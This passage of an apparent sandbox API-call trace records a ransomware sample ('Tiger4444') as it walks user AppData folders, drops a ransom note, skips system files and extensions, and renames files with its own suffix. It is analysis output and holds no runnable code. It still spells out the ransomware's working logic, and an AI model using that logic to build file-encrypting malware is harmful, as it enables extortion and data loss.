dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.946] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.948] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.949] CloseHandle (hObject=0x2ac) returned 1 [0051.949] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned 47 [0051.949] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.949] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0051.950] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.950] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.950] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.950] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.950] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.950] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.950] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.950] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.950] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.950] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.950] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83fbfc1d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83fbfc1d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.950] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.950] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83fbfc1d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83fbfc1d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.950] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0051.950] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\vault\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.951] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.951] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.951] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.951] CloseHandle (hObject=0x2c8) returned 1 [0051.951] CloseHandle (hObject=0x2ac) returned 1 [0051.951] GetCurrentThreadId () returned 0xfa8 [0051.951] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc915d0 [0051.951] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" [0051.951] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61e68 | out: hHeap=0xc50000) returned 1 [0051.952] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc915c8 | out: hHeap=0xc50000) returned 1 [0051.952] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof" [0051.952] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\" [0051.952] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3" [0051.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.953] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.955] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.956] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.956] CloseHandle (hObject=0x2ac) returned 1 [0051.957] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof") returned 48 [0051.957] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.957] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73148 [0051.957] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.957] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.957] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.957] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.957] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.957] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.957] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.957] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.957] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.957] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.957] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83fbfc1d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83fbfc1d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83fbfc1d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.957] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.958] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.958] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Tiger4444.exe") returned -1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2=".") returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="..") returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="windows") returned -1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="bootmgr") returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="pagefile.sys") returned -1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="boot") returned 1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ids.txt") returned -1 [0051.958] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="NTUSER.DAT") returned -1 [0051.958] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="CUSTOM.DIC" | out: lpString1="CUSTOM.DIC") returned="CUSTOM.DIC" [0051.958] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", dwFileAttributes=0x0) returned 1 [0051.958] lstrlenW (lpString="CUSTOM.DIC") returned 10 [0051.958] lstrlenW (lpString="Tiger4444") returned 9 [0051.958] lstrcmpiW (lpString1="USTOM.DIC", lpString2="Tiger4444") returned 1 [0051.958] lstrlenW (lpString=".dll") returned 4 [0051.958] lstrcmpiW (lpString1=".DIC", lpString2=".dll") returned -1 [0051.958] lstrlenW (lpString=".lnk") returned 4 [0051.958] lstrcmpiW (lpString1=".DIC", lpString2=".lnk") returned -1 [0051.958] lstrlenW (lpString=".ini") returned 4 [0051.958] lstrcmpiW (lpString1=".DIC", lpString2=".ini") returned -1 [0051.958] lstrlenW (lpString=".sys") returned 4 [0051.958] lstrcmpiW (lpString1=".DIC", lpString2=".sys") returned -1 [0051.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.958] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.958] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14341160660) returned 1 [0051.959] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=18) returned 1 [0051.959] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0051.959] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0051.959] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2a4 [0051.962] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0051.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0051.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.963] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14341616566) returned 1 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0051.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0051.963] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.963] CloseHandle (hObject=0x2a4) returned 1 [0051.963] CloseHandle (hObject=0x2c8) returned 1 [0051.963] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.Tiger4444") returned 69 [0051.963] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\custom.dic.tiger4444"), dwFlags=0x1) returned 1 [0051.964] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x12, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 0 [0051.964] FindClose (in: hFindFile=0xc73148 | out: hFindFile=0xc73148) returned 1 [0051.964] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\UProof\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\uproof\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.965] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.965] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.966] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.966] CloseHandle (hObject=0x2c8) returned 1 [0051.966] CloseHandle (hObject=0x2ac) returned 1 [0051.966] GetCurrentThreadId () returned 0xfa8 [0051.966] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91610 [0051.966] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" [0051.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0051.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91608 | out: hHeap=0xc50000) returned 1 [0051.966] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates" [0051.966] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\" [0051.966] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3" [0051.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.977] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.979] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.980] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.980] CloseHandle (hObject=0x2ac) returned 1 [0051.981] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates") returned 51 [0051.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xf50bbe18, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x8400c0d1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73088 [0051.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.981] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.981] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.981] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.981] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xf50bbe18, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x8400c0d1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.981] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.981] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.981] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.981] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.981] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.981] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8400c0d1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8400c0d1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8400c0d1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.981] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0x348a4400, ftLastWriteTime.dwHighDateTime=0x1d24188, nFileSizeHigh=0x0, nFileSizeLow=0x5cc66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cashflow analysis.xltm", cAlternateFileName="CASHFL~1.XLT")) returned 1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="Tiger4444.exe") returned -1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2=".") returned 1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="..") returned 1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="windows") returned -1 [0051.981] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="bootmgr") returned 1 [0051.982] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="pagefile.sys") returned -1 [0051.982] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="boot") returned 1 [0051.982] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ids.txt") returned -1 [0051.982] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="NTUSER.DAT") returned -1 [0051.982] lstrcpyW (in: lpString1=0x30aeb10, lpString2="Cashflow analysis.xltm" | out: lpString1="Cashflow analysis.xltm") returned="Cashflow analysis.xltm" [0051.982] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm", dwFileAttributes=0x0) returned 1 [0051.982] lstrlenW (lpString="Cashflow analysis.xltm") returned 22 [0051.982] lstrlenW (lpString="Tiger4444") returned 9 [0051.982] lstrcmpiW (lpString1="ysis.xltm", lpString2="Tiger4444") returned 1 [0051.982] lstrlenW (lpString=".dll") returned 4 [0051.982] lstrcmpiW (lpString1="xltm", lpString2=".dll") returned 1 [0051.982] lstrlenW (lpString=".lnk") returned 4 [0051.982] lstrcmpiW (lpString1="xltm", lpString2=".lnk") returned 1 [0051.982] lstrlenW (lpString=".ini") returned 4 [0051.982] lstrcmpiW (lpString1="xltm", lpString2=".ini") returned 1 [0051.983] lstrlenW (lpString=".sys") returned 4 [0051.983] lstrcmpiW (lpString1="xltm", lpString2=".sys") returned 1 [0051.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, 